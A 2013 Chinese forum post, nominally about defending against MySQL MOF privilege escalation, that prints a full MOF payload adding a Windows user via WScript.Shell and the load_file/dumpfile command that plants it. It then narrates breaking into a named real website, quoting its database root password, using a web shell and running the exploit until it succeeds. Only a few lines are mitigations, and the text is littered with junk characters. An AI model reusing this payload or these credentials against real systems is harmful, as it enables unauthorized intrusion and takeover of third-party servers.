Mysql mof扩展漏洞防范方法/ B" N) x, d+ v* L' K
$ p8 D: I' a5 g& J
网上公开的一些利用代码:6 }6 x) a% |5 L# G" i7 P O, ~+ X# U5 }9 _
/ `8 i2 B9 U* p
#pragma namespace(“\\\\.\\root\\subscription”)# x/ Z6 Y- R) P* |0 W4 s
2 W! G* P. p4 H. L- F) P
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; B8 m# S3 x( t% d: T
+ q3 c$ j% j& f$ Z" W# X: N4 f ( r, z9 p9 n8 h% d9 n% p
2 [7 b0 ]7 s ?( _2 c0 H3 `6 U
2 Z+ u$ _, O; n* P8 i7 X L1 ~% v6 ?6 S5 z8 r% k
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;# A: z [9 v9 x9 ?9 |4 |1 m8 ^9 S
从上面代码来看得出解决办法:: L9 p2 }/ s/ K& `
# b- a9 Z4 _. x6 ` P( ~
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数+ p" Z) r6 b( \7 C, C
8 J% H# ^7 M) N7 {+ ~# F$ v4 L' m8 g2、禁止使用”WScript.Shel”组件 Z$ o& i6 `8 d9 V, d
1 g- s$ m! {7 y( ^5 ^& m
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER2 ^8 j! l+ A; `$ Q" ^! f1 N
; q& f' Z! o- {( G) Y- L2 q
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下) J1 H% h; U/ m6 y/ |8 s4 U
# h; Z" u7 a) x9 L
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权+ f! I8 d+ o1 ~ x' f
1 A7 a4 R5 x( P, c7 @但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
# q$ S6 \% J; ~+ z3 c( [$ \" K0 W. V/ F0 S4 Z4 @- \1 t
看懂了后就开始练手吧
. M3 a7 }* ]) a1 d) r7 p5 U9 G+ f) s y& r4 C' N1 ~
http://www.webbmw.com/config/config_ucenter.php 一句话 a
/ j/ j, U/ ?6 R6 P1 l4 g. v+ U
, k1 c; h' A" Q) M/ x1 H' E$ n$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
) I3 B6 L. c. T% {" u I, N C" I2 q( |: n
于是直接用菜刀开搞3 c7 j9 B& V6 ^5 w8 w( `+ P3 Y8 [
+ p6 P/ r/ Q8 s7 d7 Y上马先6 W9 n) N# l" [ L
) H5 ~+ j! \* p
既然有了那些账号 之类的 于是我们就执行吧…….
- Y9 W% i( ^) w G- M' s7 J
) M* g* e0 Q5 P# v- W+ T1 N" D4 }小小的说下' x# ?& U1 v6 D1 K0 G; ~" c
% o6 V- s, d5 ?在这里第1次执行未成功 原因未知; J% H; E& m: g" W9 z
2 j$ ^. ^# Q. }+ |/ e: ], b我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。$ n+ z6 l* l- p* F/ Q% o
) y1 e7 o% d: Z
#pragma namespace(“\\\\.\\root\\subscription”)
1 I4 r1 ?* O! k. x2 D# L N8 [8 e
6 Z& W% t) J6 X$ J5 Oinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };+ g7 H/ |4 O: v" n& E8 C
2 k! m6 T" K6 ]) x* E1 F我是将文件放到C:\WINDOWS\temp\1.mof) N' o' e$ m! }1 t
+ g$ q9 b$ w$ Q! l1 T$ t2 r
所以我们就改下执行的代码
$ W( _1 }8 {* y# l
1 a6 W! F: A) M" aselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;, M4 W! f/ Y8 O' P
, `' ]: x: n" f$ f3 K% T, s
& R$ u' V6 c2 Z K; ~: E8 h2 @# E/ K) Q& N
但是 你会发现账号还是没有躺在那里。。- W8 f1 j6 _7 [9 k2 I* Q- b1 }
% ^# \+ B% j% l) f' X5 C+ s于是我就感觉蛋疼
d- D6 W6 A! I6 u& [
& C: K9 S0 z" ]0 z# m就去一个一个去执行 但是执行到第2个 mysql时就成功了………
1 y! K+ e& r6 }% n
i$ |. m, R3 B! N: \
, K9 A+ e5 { q: \7 p. [) i- t4 B8 F R' W- ^7 ]
但是其他库均不成功…
2 @7 w9 S8 h0 o$ B' _$ M2 }4 o5 I% i C- w
我就很费解呀 到底为什么不成功求大牛解答…
/ v! ]8 H5 l$ O# M. X9 _' Q4 s8 y# y/ T( l
]# [/ a8 M6 R% A1 j+ _6 ~, i7 g5 U& Y( l) E. O2 x
|
发表于 2013-1-4 19:49:49
收藏
支持
反对